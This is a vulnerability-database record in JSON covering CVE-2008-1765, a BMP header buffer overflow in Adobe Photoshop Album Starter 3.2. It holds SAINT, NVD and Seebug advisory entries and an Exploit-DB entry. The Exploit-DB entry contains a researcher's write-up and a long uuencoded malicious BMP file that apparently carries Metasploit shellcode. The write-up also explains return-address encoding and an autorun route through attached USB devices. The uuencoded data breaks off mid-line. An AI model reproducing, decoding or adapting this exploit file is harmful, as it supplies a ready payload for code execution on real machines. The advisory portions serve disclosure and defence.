A buffer overflow vulnerability in Adobe Photoshop Album Starter Edition allows command execution when a user opens a BMP image file containing a specially crafted header.
Exploit works on Adobe Photoshop Album Starter 3.2 on Windows XP SP2 or Windows Vista SP0.
Platforms
Windows
{"id": "SAINT:069181E9466743358EB844E233A68985", "bulletinFamily": "exploit", "title": "Adobe Photoshop Album Starter Edition BMP image header buffer overflow", "description": "Added: 05/08/2008 \nCVE: [CVE-2008-1765](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1765>) \nBID: [28874](<http://www.securityfocus.com/bid/28874>) \nOSVDB: [44579](<http://www.osvdb.org/44579>) \n\n\n### Background\n\n[Adobe Photoshop Album Starter Edition](<http://www.adobe.com/products/photoshopalbum/starter.html>) is free software for editing and sharing photos. \n\n### Problem\n\nA buffer overflow vulnerability in Adobe Photoshop Album Starter Edition allows command execution when a user opens a BMP image file containing a specially crafted header. \n\n### Resolution\n\nSee the [Adobe Security Advisory](<http://www.adobe.com/support/security/advisories/apsa08-04.html>) and apply a patch when available. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa08-04.html> \n<http://archives.neohapsis.com/archives/fulldisclosure/2008-04/0551.html> \n\n\n### Limitations\n\nExploit works on Adobe Photoshop Album Starter 3.2 on Windows XP SP2 or Windows Vista SP0. \n\n### Platforms\n\nWindows \n \n\n", "published": "2008-05-08T00:00:00", "modified": "2008-05-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_bmp_header", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2008-1765"], "type": "saint", "lastseen": "2018-08-31T00:08:18", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2008-1765"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 05/08/2008 \nCVE: [CVE-2008-1765](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1765>) \nBID: [28874](<http://www.securityfocus.com/bid/28874>) \nOSVDB: [44579](<http://www.osvdb.org/44579>) \n\n\n### Background\n\n[Adobe Photoshop Album Starter Edition](<http://www.adobe.com/products/photoshopalbum/starter.html>) is free software for editing and sharing photos. \n\n### Problem\n\nA buffer overflow vulnerability in Adobe Photoshop Album Starter Edition allows command execution when a user opens a BMP image file containing a specially crafted header. \n\n### Resolution\n\nSee the [Adobe Security Advisory](<http://www.adobe.com/support/security/advisories/apsa08-04.html>) and apply a patch when available. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa08-04.html> \n<http://archives.neohapsis.com/archives/fulldisclosure/2008-04/0551.html> \n\n\n### Limitations\n\nExploit works on Adobe Photoshop Album Starter 3.2 on Windows XP SP2 or Windows Vista SP0. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "cbb85b52f6bffba2448ceb49aa6ce4be4f1f337d1df7b15e51bef7857a3ed7fe", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca3ed38cf8b02993dd8c620276b37f53", "key": "published"}, {"hash": "62895d2eb3609e1cbab4b7a2bb555bb9", "key": "title"}, {"hash": "ca3ed38cf8b02993dd8c620276b37f53", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "3e66c40736df89fb8cacab5c510a83f3", "key": "cvelist"}, {"hash": "069181e9466743358eb844e233a68985", "key": "href"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "d8981b69019767e2e77881ee13a7052a", "key": "description"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_bmp_header", "id": "SAINT:069181E9466743358EB844E233A68985", "lastseen": "2017-01-10T14:03:44", "modified": "2008-05-08T00:00:00", "objectVersion": "1.2", "published": "2008-05-08T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Adobe Photoshop Album Starter Edition BMP image header buffer overflow", "type": "saint", "viewCount": 2}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2017-01-10T14:03:44"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2008-1765"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Added: 05/08/2008 \nCVE: [CVE-2008-1765](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1765>) \nBID: [28874](<http://www.securityfocus.com/bid/28874>) \nOSVDB: [44579](<http://www.osvdb.org/44579>) \n\n\n### Background\n\n[Adobe Photoshop Album Starter Edition](<http://www.adobe.com/products/photoshopalbum/starter.html>) is free software for editing and sharing photos. \n\n### Problem\n\nA buffer overflow vulnerability in Adobe Photoshop Album Starter Edition allows command execution when a user opens a BMP image file containing a specially crafted header. \n\n### Resolution\n\nSee the [Adobe Security Advisory](<http://www.adobe.com/support/security/advisories/apsa08-04.html>) and apply a patch when available. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa08-04.html> \n<http://archives.neohapsis.com/archives/fulldisclosure/2008-04/0551.html> \n\n\n### Limitations\n\nExploit works on Adobe Photoshop Album Starter 3.2 on Windows XP SP2 or Windows Vista SP0. \n\n### Platforms\n\nWindows \n \n\n", "edition": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "533e690760bcf7732645562e222b5d000f33744a222fd3141f1cc31117ce7987", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca3ed38cf8b02993dd8c620276b37f53", "key": "published"}, {"hash": "62895d2eb3609e1cbab4b7a2bb555bb9", "key": "title"}, {"hash": "ca3ed38cf8b02993dd8c620276b37f53", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "3e66c40736df89fb8cacab5c510a83f3", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "069181e9466743358eb844e233a68985", "key": "href"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "d8981b69019767e2e77881ee13a7052a", "key": "description"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_bmp_header", "id": "SAINT:069181E9466743358EB844E233A68985", "lastseen": "2018-08-30T20:07:44", "modified": "2008-05-08T00:00:00", "objectVersion": "1.3", "published": "2008-05-08T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Adobe Photoshop Album Starter Edition BMP image header buffer overflow", "type": "saint", "viewCount": 2}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T20:07:44"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "3e66c40736df89fb8cacab5c510a83f3"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "d8981b69019767e2e77881ee13a7052a"}, {"key": "href", "hash": "069181e9466743358eb844e233a68985"}, {"key": "modified", "hash": "ca3ed38cf8b02993dd8c620276b37f53"}, {"key": "published", "hash": "ca3ed38cf8b02993dd8c620276b37f53"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a2e6da74c8b179f121f93bda28c97a91"}, {"key": "title", "hash": "62895d2eb3609e1cbab4b7a2bb555bb9"}, {"key": "type", "hash": "2a4c1f6b0cd88cf3fac4b56bd4283522"}], "hash": "cbb85b52f6bffba2448ceb49aa6ce4be4f1f337d1df7b15e51bef7857a3ed7fe", "viewCount": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1765"]}, {"type": "exploitdb", "idList": ["EDB-ID:5479"]}, {"type": "saint", "idList": ["SAINT:149FC74E73781FF99574CB70DFC5C3FE", "SAINT:14876E1FE6E1EFF3F88F16FB4DFA563E"]}, {"type": "seebug", "idList": ["SSV:3208"]}], "modified": "2018-08-31T00:08:18"}, "vulnersScore": 9.3}, "objectVersion": "1.3"}
{"cve": [{"lastseen": "2017-09-29T14:25:50", "bulletinFamily": "NVD", "description": "Buffer overflow in Adobe Photoshop Album Starter Edition 3.2, and possibly After Effects CS3, allows user-assisted remote attackers and physically proximate attackers to execute arbitrary code via a BMP file with an invalid image header. NOTE: the related issue in Photoshop CS3 is already covered by CVE-2007-2244.", "modified": "2017-09-28T21:30:51", "published": "2008-04-23T09:05:00", "id": "CVE-2008-1765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1765", "title": "CVE-2008-1765", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "description": "Added: 05/08/2008 \nCVE: [CVE-2008-1765](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1765>) \nBID: [28874](<http://www.securityfocus.com/bid/28874>) \nOSVDB: [44579](<http://www.osvdb.org/44579>) \n\n\n### Background\n\n[Adobe Photoshop Album Starter Edition](<http://www.adobe.com/products/photoshopalbum/starter.html>) is free software for editing and sharing photos. \n\n### Problem\n\nA buffer overflow vulnerability in Adobe Photoshop Album Starter Edition allows command execution when a user opens a BMP image file containing a specially crafted header. \n\n### Resolution\n\nSee the [Adobe Security Advisory](<http://www.adobe.com/support/security/advisories/apsa08-04.html>) and apply a patch when available. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa08-04.html> \n<http://archives.neohapsis.com/archives/fulldisclosure/2008-04/0551.html> \n\n\n### Limitations\n\nExploit works on Adobe Photoshop Album Starter 3.2 on Windows XP SP2 or Windows Vista SP0. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2008-05-08T00:00:00", "published": "2008-05-08T00:00:00", "id": "SAINT:149FC74E73781FF99574CB70DFC5C3FE", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_bmp_header", "type": "saint", "title": "Adobe Photoshop Album Starter Edition BMP image header buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 05/08/2008 \nCVE: [CVE-2008-1765](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1765>) \nBID: [28874](<http://www.securityfocus.com/bid/28874>) \nOSVDB: [44579](<http://www.osvdb.org/44579>) \n\n\n### Background\n\n[Adobe Photoshop Album Starter Edition](<http://www.adobe.com/products/photoshopalbum/starter.html>) is free software for editing and sharing photos. \n\n### Problem\n\nA buffer overflow vulnerability in Adobe Photoshop Album Starter Edition allows command execution when a user opens a BMP image file containing a specially crafted header. \n\n### Resolution\n\nSee the [Adobe Security Advisory](<http://www.adobe.com/support/security/advisories/apsa08-04.html>) and apply a patch when available. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa08-04.html> \n<http://archives.neohapsis.com/archives/fulldisclosure/2008-04/0551.html> \n\n\n### Limitations\n\nExploit works on Adobe Photoshop Album Starter 3.2 on Windows XP SP2 or Windows Vista SP0. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2008-05-08T00:00:00", "published": "2008-05-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_bmp_header", "id": "SAINT:14876E1FE6E1EFF3F88F16FB4DFA563E", "title": "Adobe Photoshop Album Starter Edition BMP image header buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:44:02", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 28874\r\nCVE(CAN) ID: CVE-2008-1765\r\n\r\nAdobe Photoshop Album Starter Edition\u662fAdobe\u516c\u53f8\u4e13\u4e3a\u5904\u7406\u76f8\u7247\u7684\u7528\u6237\u8bbe\u8ba1\u7684Photoshop\u7b80\u5316\u7248\u672c\uff0c\u5141\u8bb8\u7528\u6237\u66f4\u5bb9\u6613\u7684\u4fee\u6539\u3001\u7f8e\u5316\u7167\u7247\u3002\r\n\r\nAlbum Starter\u5728\u6e32\u67d3\u56fe\u5f62\u4e4b\u524d\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1BMP\u56fe\u5f62\u5934\u662f\u5426\u6709\u6548\uff0c\u5982\u679c\u7528\u6237\u53d7\u9a97\u6253\u5f00\u4e86\u6076\u610f\u7684bmp\u56fe\u5f62\u6587\u4ef6\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u6b64\u5916\uff0cAlbum Starter\u6240\u8fd0\u884c\u7684\u4e00\u4e2a\u670d\u52a1\u81ea\u52a8\u67e5\u627e\u8fde\u63a5\u5230\u7cfb\u7edf\u7684\u8bbe\u5907\uff08\u5982\u76f8\u673a\u6216USB\u9a71\u52a8\uff09\uff0c\u4e00\u65e6\u627e\u5230\u4e86\u8fd9\u7c7b\u8bbe\u5907\u5c31\u4f1a\u81ea\u52a8\u67e5\u627e\u56fe\u5f62\u6587\u4ef6\u5e76\u81ea\u52a8\u5bfc\u5165\u56fe\u5f62\uff0c\u56e0\u6b64\u653b\u51fb\u8005\u8fd8\u53ef\u4ee5\u901a\u8fc7\u5c06\u79fb\u52a8\u8bbe\u5907\u8fde\u63a5\u5230\u8ba1\u7b97\u673a\u6765\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\u3002\r\n\n\nAdobe Photoshop Album Starter Edition 3.2\n Adobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n<a href=http://www.adobe.com target=_blank>http://www.adobe.com</a>", "modified": "2008-04-23T00:00:00", "published": "2008-04-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3208", "id": "SSV:3208", "title": "Adobe Photoshop Album Starter Edition BMP\u56fe\u5f62\u5934\u5904\u7406\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n http://www.sebug.net/exploit/3466\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-3208"}], "exploitdb": [{"lastseen": "2016-01-31T22:10:45", "bulletinFamily": "exploit", "description": "Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit. CVE-2008-1765. Local exploit for windows platform", "modified": "2008-04-21T00:00:00", "published": "2008-04-21T00:00:00", "id": "EDB-ID:5479", "href": "https://www.exploit-db.com/exploits/5479/", "type": "exploitdb", "title": "Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit", "sourceData": "Exploitable issue in various Adobe products\nc0ntex (c0ntexb@gmail.com) Scott Laurie\nFebruary 2008\n\nVulnerable applications, tested:\nAdobe Photoshop Album Starter\nAdobe After Effects CS3\nAdobe Photoshop CS3\n\nNot Vulnerable applications, tested:\nAdobe Reader\nAdobe Flash Player\n\nThis bug is related to the parsing of header images, in that the applications\ndo not verify that the image header is valid before trying to render it. This\nleaves an opportunity to cause an unchecked buffer overflow and allow for the\nexecution of malicious code.\n\nAll the issues are standard local overflows whereby an attacker can exploit a\nmachine after sending the malicious image to the user, or by placing the image\non a web site or email and waiting for a user to view it in one of the effected\nproducts.\n\nOne fun thing with Album Starter is that it will run a service which will look\nfor new devices being attached to the system, things like cameras or USB drives\nand when one is found it will check the device for image files. If some are\nfound, the application will auto-run and import the images and thus allow the\nattacker to exploit locked workstations.. pretty lame but fun :)\n\nThere is a caveats to the bug as the shellcode and return address need to be 4\nbyte values. Thus a return address of 0x41424344 needs to be in the following\nformat: \"\\x44\\x44\\x44\\x44\\x43\\x43\\x43\\x43\\x42\\x42\\x42\\x42\\x41\\x41\\x41\\x41\"\n\n\nExploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe:\nUsed shellcode is taken from the Metasploit project.\n\n\nbegin 644 Adobe_AS_Exploit.bmp\nM0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04'\\:NM-Z/G___]@BVPD)(M%/(M\\!7@![XM/\nM&(M?(`'K28LTBP'N,<\"9K(3`=\"#!R@T*`<+K]#M4)\"AUY8M?)`'K9HL,2XM?\nM'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`<K8M`\"%YHCDX.[%#_UF939F@S,FAW\nM<S)?5/_0:,OM_#M0_]9?B>5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_\nMT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90\nM5%15_]\"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\\ZK^0BW^\nM0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!<Y3_]9J__\\W\nM_]\"+5_R#Q&3_UE+_T&CPB@1?4__6_]``04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!\nM04%!04%!04%!04%!04%!04%!04%!0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"\nM0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D)\"0D-#0T-#0T-#0T-#0T-#\nM0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#Z^OKZP0$!`20D)\"0\nMD)\"0D&9F9F9=75U=L+\"PL&%A86&0D)\"0D)\"0D)\"0D)\"0D)\"0,S,S,\\G)R<F#\nM@X.#Z>GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)\"0D)/3T]/1;6UM;@8&!@7-S\nM<W,3$Q,36EI:6N[N[NXG)R<GBHJ*BH.#@X/KZ^OK_/S\\_.+BXN+T]/3TIJ:F\nMI@8&!@9C8V-CBHJ*BEI:6EKN[N[NK*RLK,_/S\\]F9F9F965E95M;6UN/CX^/\nM(B(B(N_O[^_(R,C(`0$!`145%17V]O;VK*RLK-75U=5Z>GIZ[^_O[\\S,S,S#\nMP\\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G\nMY^?^_O[^75U=72\\O+R_M[>WMAX>'AUM;6ULL+\"PLS,S,S'Y^?GYA86%ANKJZ\nMN@,#`P..CHZ.+R\\O+PL+\"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1\nMXN+BXFQL;&P!`0$!!04%!?+R\\O(F)B8F86%A8='1T='R\\O+RK*RLK(N+B